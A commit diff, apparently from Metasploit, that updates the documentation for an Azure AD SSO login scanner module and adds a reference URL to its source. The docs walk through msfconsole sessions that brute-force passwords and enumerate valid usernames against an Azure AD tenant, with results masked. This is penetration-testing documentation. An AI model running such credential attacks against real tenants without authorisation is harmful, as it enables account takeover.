Land #15900, Update Azure AD Login Scanner Docs
This commit is contained in:
commit
bfea5137b9
|
@ -1,10 +1,10 @@
|
|||
## Vulnerable Application
|
||||
|
||||
The Microsoft Azure AD service has a vulnerable endpoint that delivers an error-code based response
|
||||
to specific authentication requests in XML. The endpoint, when passed the correct credentials,
|
||||
will respond with a DesktopSsoToken that can be used to authenticate to Azure AD. When
|
||||
the authentication is unsuccessful, the error code that is returned can be used to discover the
|
||||
validity of usernames in the target tenant.
|
||||
The Microsoft Azure AD SSO service has a vulnerable endpoint that delivers an error-code based
|
||||
response to specific authentication requests in XML. The endpoint, when passed the correct
|
||||
credentials, will respond with a DesktopSsoToken that can be used to authenticate to Azure AD.
|
||||
When the authentication is unsuccessful, the error code that is returned can be used to discover
|
||||
the validity of usernames in the target tenant.
|
||||
This module also reports credentials to the credentials database when they are discovered.
|
||||
|
||||
## Verification Steps
|
||||
|
@ -44,10 +44,14 @@ A file with passwords, one per line.
|
|||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Azure AD Tenants with SSO Enabled
|
||||
If a tenant's domain is known, you can use this module for username and password brute-forcing.
|
||||
|
||||
Specific target output replaced with *s so as not to disclose information
|
||||
```msf6 > use auxiliary/scanner/http/azure_ad_login
|
||||
|
||||
```
|
||||
msf6 > use auxiliary/scanner/http/azure_ad_login
|
||||
msf6 auxiliary(scanner/http/azure_ad_login) > set USER_FILE /home/kali/users.txt
|
||||
USER_FILE => /home/kali/users.txt
|
||||
msf6 auxiliary(scanner/http/azure_ad_login) > set PASS_FILE /home/kali/pass.txt
|
||||
|
@ -69,11 +73,13 @@ msf6 auxiliary(scanner/http/azure_ad_login) > run
|
|||
[+] Login example.com\****:****** is valid!
|
||||
[+] Desktop SSO Token: *******************************************
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed```
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
If a tenant's domain is known, you can enumerate their usernames
|
||||
|
||||
```msf6 > use auxiliary/scanner/http/azure_ad_login
|
||||
```
|
||||
msf6 > use auxiliary/scanner/http/azure_ad_login
|
||||
msf6 auxiliary(scanner/http/azure_ad_login) > set USER_FILE /home/kali/users.txt
|
||||
USER_FILE => /home/kali/users.txt
|
||||
msf6 auxiliary(scanner/http/azure_ad_login) > set PASSWORD password
|
||||
|
@ -86,11 +92,5 @@ msf6 auxiliary(scanner/http/azure_ad_login) > run
|
|||
[-] example.com\k0pak4 is not a valid user
|
||||
[+] Password password is invalid but example.com\**** is valid!
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed```
|
||||
|
||||
## Version and OS
|
||||
Tested against current Azure AD tenants.
|
||||
|
||||
## References
|
||||
- https://arstechnica.com/information-technology/2021/09/new-azure-active-directory-password-brute-forcing-flaw-has-no-fix/
|
||||
- https://github.com/treebuilder/aad-sso-enum-brute-spray
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
|
|
@ -21,6 +21,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
[ 'URL', 'https://raxis.com/blog/metasploit-azure-ad-login'],
|
||||
[ 'URL', 'https://arstechnica.com/information-technology/2021/09/new-azure-active-directory-password-brute-forcing-flaw-has-no-fix/'],
|
||||
[ 'URL', 'https://github.com/treebuilder/aad-sso-enum-brute-spray'],
|
||||
],
|
||||
|
|
Loading…
Reference in New Issue